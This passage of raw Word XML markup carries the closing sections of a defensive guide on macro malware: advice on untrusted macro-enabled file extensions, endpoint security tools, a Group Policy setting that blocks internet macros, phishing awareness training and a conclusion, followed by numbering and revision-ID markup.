        <w:t>Check file extensions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Avoid opening </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>.docm, .xlsm, or .pptm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files unless they come from a trusted source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575EED7B" w14:textId="49B247CE" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Attackers often disguise malicious macros in urgent-looking emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC97706" w14:textId="62FC205E" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="009816E9"/>
    <w:p w14:paraId="1EE81E3D" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Use Endpoint Security Solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DCC3C8" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Antivirus &amp; Endpoint Detection and Response (EDR)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tools like: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F9D48" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51B3E3" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CrowdStrike Falcon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6EF869" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SentinelOne</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3CB208" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Malwarebytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286A73C" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep them </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>up to date</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to detect and block malicious macro files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66554B99" w14:textId="77777777" w:rsidR="00AA3D72" w:rsidRDefault="00AA3D72" w:rsidP="009816E9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4C2B5C" w14:textId="0C8F08E7" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Block Macros from the Internet (Group Policy - Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77283452" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For enterprise environments, admins can use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Group Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to block macros in downloaded files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C2E11" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Group Policy Editor (gpedit.msc)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D301AD1" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRPr="00AA3D72" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Navigate to:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Computer Configuration → Administrative Templates → Microsoft Office → Microsoft Office 2016 → Security Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79819931" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Block macros from running in Office files from the internet"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C35D2" w14:textId="77777777" w:rsidR="00AA3D72" w:rsidRDefault="00AA3D72" w:rsidP="009816E9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40289E15" w14:textId="1727E190" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA3D72">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. Train Users on Social Engineering &amp; Phishing Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71457174" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>cybersecurity awareness training</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E6994" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Teach them how to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C4FEBF" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recognize phishing emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DD721" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Avoid downloading suspicious attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E2DCA3" w14:textId="77777777" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Report suspicious activity to the IT security team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31660BF7" w14:textId="0660A3A8" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00AA3D72"/>
    <w:p w14:paraId="26E21E3C" w14:textId="2F829BA7" w:rsidR="00AA3D72" w:rsidRDefault="00AA3D72" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE9565" w14:textId="4BAE9ADE" w:rsidR="00AA3D72" w:rsidRPr="00AA3D72" w:rsidRDefault="00AA3D72" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve">Macro malware remains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>significant cybersecurity threat</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve">, often used in phishing campaigns to gain access to systems. However, organizations and individuals can protect themselves by </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>disabling macros</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>using security tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>educating users</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve"> on social engineering tactics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16094E" w14:textId="2898C4C5" w:rsidR="00AA3D72" w:rsidRPr="00AA3D72" w:rsidRDefault="00AA3D72" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve">By implementing these strategies, users can </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>significantly reduce the risk of macro malware infections</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve"> while maintaining productivity in a secure computing environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F9F00" w14:textId="77777777" w:rsidR="00AA3D72" w:rsidRPr="00AA3D72" w:rsidRDefault="00AA3D72" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stay safe. Stay secure!</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3D72">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44730958" w14:textId="77777777" w:rsidR="00AA3D72" w:rsidRPr="00CA44D3" w:rsidRDefault="00AA3D72" w:rsidP="00AA3D72">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AA3D72" w:rsidRPr="00CA44D3">
      <w:headerReference w:type="default" r:id="rId20"/>
      <w:footerReference w:type="default" r:id="rId21"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="851" w:right="1134" w:bottom="851"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5EC5" w14:textId="77777777" w:rsidR="009C31E4" w:rsidRDefault="009C31E4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F0DBFA4" w14:textId="77777777" w:rsidR="009C31E4" w:rsidRDefault="009C3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0DB4" w14:textId="77777777" w:rsidR="00745F0C" w:rsidRDefault="0074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01BC" w14:textId="77777777" w:rsidR="009C31E4" w:rsidRDefault="009C31E4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="47F388E2" w14:textId="77777777" w:rsidR="009C31E4" w:rsidRDefault="009C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CECB" w14:textId="77777777" w:rsidR="00745F0C" w:rsidRDefault="0074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328"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA722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3509A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6232B5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62861D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9474BA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7B310D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="104C7142"/>
    <w:lvl w:ilvl="0" w:tplc="B17C4E8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6149B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80E8ED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6637D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB524D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F2B4712"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F80C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95DCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="307C90F0"/>
    <w:lvl w:ilvl="0" w:tplc="B17C4E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="center"/>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0EA4729"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CA094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D0D6F30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA3608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E230A11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0567C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40C439E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="440C4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C1E54F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53D0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E14E3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80E40A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A3622C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="768A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37A8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42B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17217"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33EA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F5D7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EC4EE7E"/>
    <w:lvl w:ilvl="0" w:tplc="B17C4E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="center"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B17C4E82">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927A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CAA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F66C00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F20BE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6F8050C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBF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356DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B94C418E"/>
    <w:lvl w:ilvl="0" w:tplc="B17C4E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="center"/>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2C82FE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79A402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BA41288"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="498CEA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EB0023C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E86878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9"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="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03"/>
    <w:rsid w:val="00005B34"/>
    <w:rsid w:val="00016B90"/>
    <w:rsid w:val="0003177C"/>
    <w:rsid w:val="000370DA"/>
    <w:rsid w:val="00037D35"/>
    <w:rsid w:val="000462DB"/>
    <w:rsid w:val="00052852"/>
    <w:rsid w:val="0005723B"/>
    <w:rsid w:val="00063797"/>
    <w:rsid w:val="000841A1"/>
    <w:rsid w:val="00085D5B"/>
    <w:rsid w:val="00086159"/>
    <w:rsid w:val="00094E94"/>
    <w:rsid w:val="00095834"/>
    <w:rsid w:val="000A4066"/>
    <w:rsid w:val="000B20AE"/>
    <w:rsid w:val="000B23DD"/>
    <w:rsid w:val="000D5B75"/>
    <w:rsid w:val="000E3F2D"/>
    <w:rsid w:val="000E7693"/>
    <w:rsid w:val="00114173"/>
    <w:rsid w:val="00140D25"/>
    <w:rsid w:val="00153AA8"/>
    <w:rsid w:val="00156EAB"/>
    <w:rsid w:val="00156F52"/>
    <w:rsid w:val="00160DE7"/>
    <w:rsid w:val="001637B5"/>
    <w:rsid w:val="00173DC7"/>
    <w:rsid w:val="00175DEC"/>
    <w:rsid w:val="001856F2"/>
    <w:rsid w:val="0019046C"/>
    <w:rsid w:val="00194BFB"/>
    <w:rsid w:val="001A4DA6"/>
    <w:rsid w:val="001B5E98"/>
    <w:rsid w:val="001C30FB"/>
    <w:rsid w:val="001C3A48"/>
    <w:rsid w:val="001C54FB"/>
    <w:rsid w:val="001E0E4A"/>
    <w:rsid w:val="001E7407"/>
    <w:rsid w:val="001F286C"/>
    <w:rsid w:val="001F519D"/>
    <w:rsid w:val="0021201F"/>
    <w:rsid w:val="00213208"/>
    <w:rsid w:val="00215792"/>
    <w:rsid w:val="0022324A"/>
    <w:rsid w:val="00236B60"/>
    <w:rsid w:val="002702A3"/>
    <w:rsid w:val="00272686"/>
    <w:rsid w:val="00272C4A"/>
    <w:rsid w:val="0028160D"/>
    <w:rsid w:val="002C555E"/>
    <w:rsid w:val="002C5E99"/>
    <w:rsid w:val="002C63AB"/>
    <w:rsid w:val="002D0723"/>
    <w:rsid w:val="002D5802"/>
    <w:rsid w:val="002E53EF"/>
    <w:rsid w:val="002F0724"/>
    <w:rsid w:val="003061B0"/>
    <w:rsid w:val="00306EE4"/>
    <w:rsid w:val="003075B0"/>
    <w:rsid w:val="0031047F"/>
    <w:rsid w:val="003107B8"/>
    <w:rsid w:val="003149DE"/>
    <w:rsid w:val="00316A79"/>
    <w:rsid w:val="00322338"/>
    <w:rsid w:val="00324DAA"/>
    <w:rsid w:val="00331211"/>
    <w:rsid w:val="0033394C"/>
    <w:rsid w:val="00337BB2"/>
    <w:rsid w:val="00337C91"/>
    <w:rsid w:val="00351150"/>
    <w:rsid w:val="003511B9"/>
    <w:rsid w:val="00365D75"/>
    <w:rsid w:val="003734FC"/>
    <w:rsid w:val="00373D07"/>
    <w:rsid w:val="00374848"/>
    <w:rsid w:val="00375E59"/>
    <w:rsid w:val="003D7028"/>
    <w:rsid w:val="00400B84"/>
    <w:rsid w:val="00405C22"/>
    <w:rsid w:val="00405D79"/>
    <w:rsid w:val="004070FA"/>
    <w:rsid w:val="00411F48"/>
    <w:rsid w:val="00416E07"/>
    <w:rsid w:val="00420B58"/>
    <w:rsid w:val="004225A3"/>
    <w:rsid w:val="00423E65"/>
    <w:rsid w:val="00431777"/>
    <w:rsid w:val="00432D15"/>
    <w:rsid w:val="00444E6C"/>
    <w:rsid w:val="004454C8"/>
    <w:rsid w:val="004458E1"/>
    <w:rsid w:val="0045275F"/>
    <w:rsid w:val="004752C0"/>
    <w:rsid w:val="00486E2B"/>
    <w:rsid w:val="0049205A"/>
    <w:rsid w:val="00495AAE"/>
    <w:rsid w:val="004A1FFA"/>
    <w:rsid w:val="004B11DE"/>
    <w:rsid w:val="004D1602"/>
    <w:rsid w:val="004D3934"/>
    <w:rsid w:val="004D582E"/>
    <w:rsid w:val="00503FDA"/>
    <w:rsid w:val="005109BE"/>
    <w:rsid w:val="0052191D"/>
    <w:rsid w:val="00533161"/>
    <w:rsid w:val="00535F5A"/>
    <w:rsid w:val="00540AAB"/>
    <w:rsid w:val="00564C08"/>
    <w:rsid w:val="0059053C"/>
    <w:rsid w:val="005B57E1"/>
    <w:rsid w:val="005E2962"/>
    <w:rsid w:val="005E42C4"/>
    <w:rsid w:val="005F53BE"/>
    <w:rsid w:val="006069CF"/>
    <w:rsid w:val="0061300F"/>
    <w:rsid w:val="00620F15"/>
    <w:rsid w:val="00623F44"/>
    <w:rsid w:val="00640258"/>
    <w:rsid w:val="00640D29"/>
    <w:rsid w:val="006505CE"/>
    <w:rsid w:val="00656D4D"/>
    <w:rsid w:val="00667645"/>
    <w:rsid w:val="00676DEA"/>
    <w:rsid w:val="006903E7"/>
    <w:rsid w:val="006962B2"/>
    <w:rsid w:val="006A27BE"/>
    <w:rsid w:val="006A2EF8"/>
    <w:rsid w:val="006A5E11"/>
    <w:rsid w:val="006A6088"/>
    <w:rsid w:val="006B7D23"/>
    <w:rsid w:val="006B7E19"/>
    <w:rsid w:val="006C363A"/>
    <w:rsid w:val="006C5F71"/>
    <w:rsid w:val="006C75B9"/>
    <w:rsid w:val="0070108B"/>
    <w:rsid w:val="00704B61"/>
    <w:rsid w:val="00707A90"/>
    <w:rsid w:val="00710F70"/>
    <w:rsid w:val="0072247A"/>
    <w:rsid w:val="00743E99"/>
    <w:rsid w:val="0074574C"/>
    <w:rsid w:val="00745F0C"/>
    <w:rsid w:val="007470F4"/>
    <w:rsid w:val="00752D55"/>
    <w:rsid w:val="00773541"/>
    <w:rsid w:val="00776EE2"/>
    <w:rsid w:val="007812AA"/>
    <w:rsid w:val="00784FD4"/>
    <w:rsid w:val="0078738F"/>
    <w:rsid w:val="0079145E"/>
    <w:rsid w:val="007A7D4F"/>
    <w:rsid w:val="007B01D1"/>
    <w:rsid w:val="007B16EE"/>
    <w:rsid w:val="007B3E2C"/>
    <w:rsid w:val="007B4A24"/>
    <w:rsid w:val="007C16D8"/>
    <w:rsid w:val="007C4F6D"/>
    <w:rsid w:val="007D2521"/>
    <w:rsid w:val="007D2AE7"/>
    <w:rsid w:val="007E5753"/>
    <w:rsid w:val="007F62F0"/>
    <w:rsid w:val="00817E52"/>
    <w:rsid w:val="008209C6"/>
    <w:rsid w:val="00820CCA"/>
    <w:rsid w:val="00831BC1"/>
    <w:rsid w:val="008352CD"/>
    <w:rsid w:val="008453C9"/>
    <w:rsid w:val="00852169"/>
    <w:rsid w:val="008556D6"/>
    <w:rsid w:val="008840F2"/>
    <w:rsid w:val="00892414"/>
    <w:rsid w:val="00896803"/>
    <w:rsid w:val="00896852"/>
    <w:rsid w:val="008B4C8B"/>
    <w:rsid w:val="008B5287"/>
    <w:rsid w:val="008C43F6"/>
    <w:rsid w:val="008C6E31"/>
    <w:rsid w:val="008D0568"/>
    <w:rsid w:val="008D2B1E"/>
    <w:rsid w:val="008D459E"/>
    <w:rsid w:val="008D6B43"/>
    <w:rsid w:val="008E610B"/>
    <w:rsid w:val="008E6904"/>
    <w:rsid w:val="008F7214"/>
